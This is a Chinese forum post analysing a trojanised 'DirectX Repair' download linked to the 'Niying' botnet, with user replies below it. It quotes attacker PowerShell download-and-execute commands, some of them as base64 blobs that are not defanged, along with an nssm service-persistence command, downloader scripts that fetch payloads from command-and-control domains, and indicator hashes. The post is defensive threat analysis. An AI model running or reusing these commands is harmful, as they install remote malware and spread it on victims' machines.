疑似匿影僵尸网络最新活动
本帖最后由 ahov 于 2022-5-30 20:15 编辑一、 背景
近日,在帮助用户解决病毒问题时,发现用户中的是下载者木马。
其中一条日志内容为:
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作结果:已允许
进程ID:6504
操作进程:C:\Windows\nssm.exe
操作进程命令行:C:\Windows\nssm.exe
操作进程校验和:32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
父进程ID:1080
父进程:C:\Windows\System32\services.exe
父进程命令行:C:\Windows\system32\services.exe
操作系统目录竟然出现了nssm工具
将操作进程命令行进行base64解密即可得到:IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))
通过查询威胁情报,寻找到一个类似的样本hxxp://win.yearidper.com/per.txt
继续研究安全日志,发现一条日志内容为:
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell"IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作结果:已阻止
进程ID:18248
操作进程:C:\Windows\SysWOW64\cmd.exe
操作进程命令行:cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作进程校验和:4048488DE6BA4BFEF9EDF103755519F1F762668F
父进程ID:13520
父进程:C:\Windows\SysWOW64\mmc.exe
父进程命令行:mmc.exe
将该URL下载后,发现其为PowerShell下载者木马。
再次查阅安全日志:
病毒名称:Trojan/Agent
病毒ID:A68B6378A5A9FBBE
病毒路径:C:\Users\Public\sharpwmi.exe
操作类型:修改
操作结果:已处理
进程ID:13520
操作进程:C:\Windows\SysWOW64\mmc.exe
操作进程命令行:mmc.exe
父进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
发现病毒将部分文件保存至C:\Users\Public下,打开C:\Users\Public,发现多个永恒之蓝漏洞攻击程序和爆破攻击程序(pass.txt为密码字典,user.txt为用户名字典):
继续翻阅安全日志:
风险路径:C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件
风险路径:C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件
可发现病毒往系统目录塞了两个可疑vbs,文件名为WMIHACKER_0.6.vbs经过查询,WMIHACKER为内网横向渗透攻击工具。
询问用户后,用户称下载并运行了一个“dx修复工具”(DirectXRepair_4.1.0.30770_Online.rar)后出现相关症状。
二、追溯
(一)
通过hxxp://ye.yearidper.com,可查询到之前多人在多个论坛中此毒,如下图所示:
(二)
1.
通过对hxxp://cdn.comenbove.com的威胁情报查询,发现了一个通信样本(9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97):
该样本伪装为Steam相关文件
PE文件信息:
文件说明:Steam
文件版本:2.10.91.91
产品名称:Steam
语言:0x0816 0x04e4
版权:© Valve Corporation
运行后,该样本会直接访问并下载hxxp://cdn.comenbove.com/shell.txt,内容为Powershell下载者木马:
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt
该样本同时会执行命令行:
powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=
base64解密后为:
IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))
访问并下载hxxp://5d.bbacpummd.cloud,内容为:
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt
同时,我们发现,样本还会访问并下载http://5d.strongapt.ml当中的文件,但网站已挂,经过查询发现该域名曾被用于“匿影”僵尸网络投放此前的“WannaRen”勒索病毒(360发现,此前地址为hxxps://api.strongapt.ml/vmp2.jpg),奇安信也早已将多个通信域名标记为“HideShadowMiner”家族处理。
实锤为疑似“匿影”僵尸网络相关病毒样本。
2.
通过对hxxp://cdn.comenbove.com的威胁情报查询,又发现该服务器还有一个hxxp://cdn.comenbove.com/smb.jpg,如下图所示:
内容为:
$fileNames = Test-Path C:\ProgramData\smbx22.txt
$nic='True'
if($fileNames -ne $nic){
(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt')
}
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt
(https://www.upload.ee/files/14046702/1.txt.html为0kb空白空文件)
三、对带毒DirectXRepair进行探究
文件名:DirectX Repair.exe
PE文件信息:
File Version Information:
Original Name:加入任务计划.exe
Internal Name:加入任务计划
File Version:1.0
文件运行后,会一边释放“dx修复工具”所需文件,一边释放nssm.exe至系统目录下:
Files Dropped:
%ProgramData%\DirectX Repair.exe
%windir%\nssm.exe
随后,便会命令行执行:
%windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA
(与“一、背景”一章当中为同一个Powershell命令,base64解密结果与第一章一致)
经过分析,样本会在%ProgramData%内释放正常使用“dx修复”功能所需的组件,而背后又在一边偷偷释放和执行%windir%\nssm.exe与cmd或Powershell下载者木马命令行,相关思维导图如下图所示:
四、价值意义
“匿影”僵尸网络曾投放“WannaRen”等勒索病毒,甚至有一部分用户中此病毒时同时中了勒索病毒(暂时无法确定其是否有关联),虽然暂未发现其他行为,但是对用户危害较大,其危害性不容小觑,用户发现告警后需及时处理。
五、Iocs
文件名病毒类型MD5
EternalBlue.ps1漏洞攻击程序17631532e3afc09eb8ccbe172adbd422
MS17010EXP.ps1漏洞攻击程序3d485260a28a458ec499a6951640f651
NoPSExec.exe黑客工具9a029b987b9a8df9613559dbe67969b5
sharpwmi.exe黑客工具8fdf897330a9c01776a4242d26089622
smbexec40.exe黑客工具23d02116f7489304bac069051636bcc8
WMIHACKER_0.6.vbs黑客工具ceb337687402e19efdf57264b2682d08
shellPowershell下载者f409c880cd868f743e30ac4b7db611fe
Ladon66.jpgPowershell下载者c8c04f28271812c48497f55e7d3d951f
smb.jpgPowershell下载者bbf56807db3e256d38aee5b3386f601a
Ladon.exe木马病毒2a871079cd6f8d845de0554a6ba29ddf
Asy.jpg木马病毒8a846340033c363af8efdbe4f865d2ad
Steam.exe木马病毒c1e7fc36f3a71f6dcb210b4f3127918d
DirectX Repair.exe木马病毒e5ec937968841a68872ac135039b3914
hxxp://ye.yearidper.com
hxxp://cdn.comenbove.com/Ladon66.jpg
hxxp://cdn.comenbove.com/shell.txt
hxxp://cdn.comenbove.com/smbdown/cp.txt
hxxp://cdn.comenbove.com/smbdown/abc.jpg
hxxp://cdn.comenbove.com/Asy.jpg
hxxp://cdn.comenbove.com/smb.jpg
hxxp://5d.bbacpummd.cloud/
*本文当中恶意链接均已做无害化处理(hxxp),base64代码可能会被防病毒软件检测到属正常现象网页不可被直接执行为了保证文章尽量完整暂时不做处理。 我爱猫哥 发表于 2022-5-31 16:28
能不能提供下pass.txt和 user.txt两个字典
;www你这角度特殊 哈哈 前天我外网的虚拟机也被中了僵尸病毒,那个中毒的虚拟机一直攻击我的物理机,我反查下工具者的IP都是来自北京的某家云服务器的攻击。估计他家服务器也全部沦陷了,这个僵尸病毒太可怕了 能不能提供下pass.txt和 user.txt两个字典 微步在线云沙箱还挺好用的。如果那个人不是动态IP,还可以用微步查查:lol 病毒更倾向于伪装和传播了 以后下载软件必须先进沙盒测试了,不然心里不安定呀 心伤的天堂 发表于 2022-5-31 17:28
你这角度特殊 哈哈
爱好就是搜集各种字典、密码 这个病毒真的是太狡猾了 我爱猫哥 发表于 2022-5-31 16:28
能不能提供下pass.txt和 user.txt两个字典
舍不得孩子套不着狼~ 染个毒就有了;www 所以 影子卫士搞起,裸,,,奔
页:
[1]
2